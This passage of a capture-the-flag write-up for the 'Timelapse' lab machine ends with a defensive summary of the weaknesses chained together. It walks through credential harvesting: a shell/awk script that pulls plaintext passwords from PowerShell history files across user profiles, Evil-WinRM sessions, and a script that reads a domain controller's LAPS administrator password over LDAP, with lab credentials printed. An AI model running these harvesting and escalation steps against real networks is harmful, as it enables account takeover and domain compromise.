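invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
$pw = ConvertTo-SecureString "ExamplePass1" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("svc_example", $pw)
exit
EOF

# extract_creds <history-file>: prints user:password for every secret that is
# later wrapped in a PSCredential (one line per pair)
extract_creds() {
    awk '
    # $var = ConvertTo-SecureString <quoted secret> ... -AsPlainText
    /ConvertTo-SecureString/ && /-AsPlainText/ {
        if (match($0, /^[$][A-Za-z_][A-Za-z0-9_]*/)) {
            var = substr($0, RSTART + 1, RLENGTH - 1)
            # first single- or double-quoted string on the line is the secret
            if (match($0, /'\''[^'\'']*'\''|"[^"]*"/))
                secret[var] = substr($0, RSTART + 1, RLENGTH - 2)
        }
    }
    # PSCredential (<quoted user>, $var): join the user with the stored secret
    /PSCredential/ {
        if (match($0, /'\''[^'\'']*'\''|"[^"]*"/)) {
            user = substr($0, RSTART + 1, RLENGTH - 2)
            rest = substr($0, RSTART + RLENGTH)
            if (match(rest, /[$][A-Za-z_][A-Za-z0-9_]*/)) {
                v = substr(rest, RSTART + 1, RLENGTH - 1)
                if (v in secret) print user ":" secret[v]
            }
        }
    }' "$1"
}

# hunt_history <profiles-root>: find every PSReadLine history under a tree of
# user profiles and report the credentials found in each
hunt_history() {
    find "$1" -type f -name ConsoleHost_history.txt -path '*PSReadLine*' |
    while IFS= read -r f; do
        extract_creds "$f" | sed "s|^|$f: |"
    done
}

hunt_history "$ROOT"
```

From a shell on the Windows side the equivalent sweep is Get-ChildItem over C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt; each profile's file is readable by that user, and by any administrator. Defensively, the same parser run over collected history files is a cheap audit for secrets that never belonged in an interactive session.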

Privilege escalation

LAPS

Check whether svc_deploy is a member of LAPS_Readers.

*Evil-WinRM* PS C:\Users\legacyy> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/31/2023 4:31:08 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\legacyy> 

svc_deploy is a member of LAPS_Readers.
That group can read the LAPS-managed local Administrator password, so query the ms-Mcs-AdmPwd attribute of the DC01 computer object. Note that DC01 is a domain controller, which has no local SAM: the "local" Administrator that LAPS manages there is the domain's built-in Administrator account.

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer -Identity dc01 -property 'ms-mcs-admpwd'


DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName       : dc01.timelapse.htb
Enabled           : True
ms-mcs-admpwd     : %tY%W@bweG9Vhb2+3+NA0t)C
Name              : DC01
ObjectClass       : computer
ObjectGUID        : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName    : DC01$
SID               : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :



*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 
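As an added example (not from the original writeup), the same attribute can be read from the attacker's Linux host with ldapsearch and the svc_deploy credential, with no shell on the DC at all. The ldapsearch invocation is left as a comment because it needs the live DC; the LDIF that follows is a constructed sample (the password value is the one the writeup obtained, the expiry timestamp is invented), and the helper names are mine. The parser also converts ms-Mcs-AdmPwdExpirationTime, the attribute that tells you when the password you just read will be rotated.

```shell
#!/bin/sh
# Added example (not from the original writeup): read the LAPS-managed password
# over LDAP from Linux and decode its expiry. Legacy LAPS stores the clear-text
# password in ms-Mcs-AdmPwd and the next rotation time in
# ms-Mcs-AdmPwdExpirationTime (Windows FILETIME: 100 ns ticks since 1601-01-01 UTC).
# Only principals holding the extended right on ms-Mcs-AdmPwd (here LAPS_Readers)
# get the attribute back; everyone else gets the object without it, not an error,
# so a missing attribute must be treated as "no access", not "no LAPS".
set -eu

# The live query (needs the DC from the writeup; not run here):
#   ldapsearch -x -H ldap://10.10.11.152 -D 'svc_deploy@timelapse.htb' -w '<password>' \
#       -b 'DC=timelapse,DC=htb' '(sAMAccountName=DC01$)' \
#       ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime

# constructed sample of the LDIF such a query returns (expiry value invented)
SAMPLE_LDIF='dn: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: %tY%W@bweG9Vhb2+3+NA0t)C
ms-Mcs-AdmPwdExpirationTime: 133000000000000000
'

# ldif_attr <attribute>: print the value of <attribute> from LDIF on stdin;
# exits 1 if the attribute is absent. A "::" separator means base64 (flagged, not decoded).
ldif_attr() {
    awk -v a="$1" '
        index($0, a ": ") == 1  { print substr($0, length(a) + 3); found = 1 }
        index($0, a ":: ") == 1 { print "(base64) " substr($0, length(a) + 4); found = 1 }
        END { if (!found) exit 1 }'
}

# filetime_to_epoch <filetime>: Unix epoch seconds (1601->1970 offset is 11644473600 s)
filetime_to_epoch() {
    echo $(( $1 / 10000000 - 11644473600 ))
}

# laps_report: LDIF on stdin -> password and rotation deadline; exits 1 when the
# password attribute was not returned (insufficient rights or LAPS not applied)
laps_report() {
    ldif="$(cat)"
    pw="$(printf '%s\n' "$ldif" | ldif_attr ms-Mcs-AdmPwd)" || {
        echo "ms-Mcs-AdmPwd not returned: account lacks the read right, or LAPS is not applied to this host" >&2
        return 1
    }
    exp="$(printf '%s\n' "$ldif" | ldif_attr ms-Mcs-AdmPwdExpirationTime)" || exp=0
    echo "password: $pw"
    if [ "$exp" -gt 0 ] 2>/dev/null; then
        # on GNU systems: date -u -d "@$(filetime_to_epoch "$exp")"
        echo "rotates at (epoch): $(filetime_to_epoch "$exp")"
    else
        echo "rotates at: unknown (no expiry attribute returned)"
    fi
}

printf '%s\n' "$SAMPLE_LDIF" | laps_report
```

Two caveats worth keeping in mind. First, because LAPS rotates the password at the expiry time, treat what you read as short-lived and note the deadline. Second, the same query run as a user outside LAPS_Readers silently returns the DC01 object without ms-Mcs-AdmPwd, which is exactly why the function above distinguishes that case from a successful read.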

The attribute is readable, and that value is the Administrator password.
Log in with it.
[screenshot: Evil-WinRM login as Administrator]
Login works, but root.txt is not on the Administrator desktop.
Look around.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../../
*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:27 AM                Administrator
d-----       10/25/2021   8:22 AM                legacyy
d-r---       10/23/2021  11:27 AM                Public
d-----       10/25/2021  12:23 PM                svc_deploy
d-----        2/23/2022   5:45 PM                TRX


*Evil-WinRM* PS C:\Users> cd TRX
*Evil-WinRM* PS C:\Users\TRX> dir


    Directory: C:\Users\TRX


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         3/3/2022  10:45 PM                3D Objects
d-r---         3/3/2022  10:45 PM                Contacts
d-r---         3/3/2022  10:45 PM                Desktop
d-r---         3/3/2022  10:45 PM                Documents
d-r---         3/3/2022  10:45 PM                Downloads
d-r---         3/3/2022  10:45 PM                Favorites
d-r---         3/3/2022  10:45 PM                Links
d-r---         3/3/2022  10:45 PM                Music
d-r---         3/3/2022  10:45 PM                Pictures
d-r---         3/3/2022  10:45 PM                Saved Games
d-r---         3/3/2022  10:45 PM                Searches
d-r---         3/3/2022  10:45 PM                Videos


*Evil-WinRM* PS C:\Users\TRX> cd Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> dir


    Directory: C:\Users\TRX\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/30/2023  11:04 PM             34 root.txt


*Evil-WinRM* PS C:\Users\TRX\Desktop> 

It was in an unusual location (the Desktop of a separate TRX profile), but that is the root.txt flag.

Summary

The following weaknesses, chained together, allowed escalation to Administrator:

  • A credential file (a user's client-authentication PFX) exposed on an anonymously readable SMB share
  • Dictionary-crackable passwords on both the ZIP and the PFX
  • A hard-coded credential left in a PowerShell history file
  • LAPS configured on the domain controller, with a service account able to read the managed password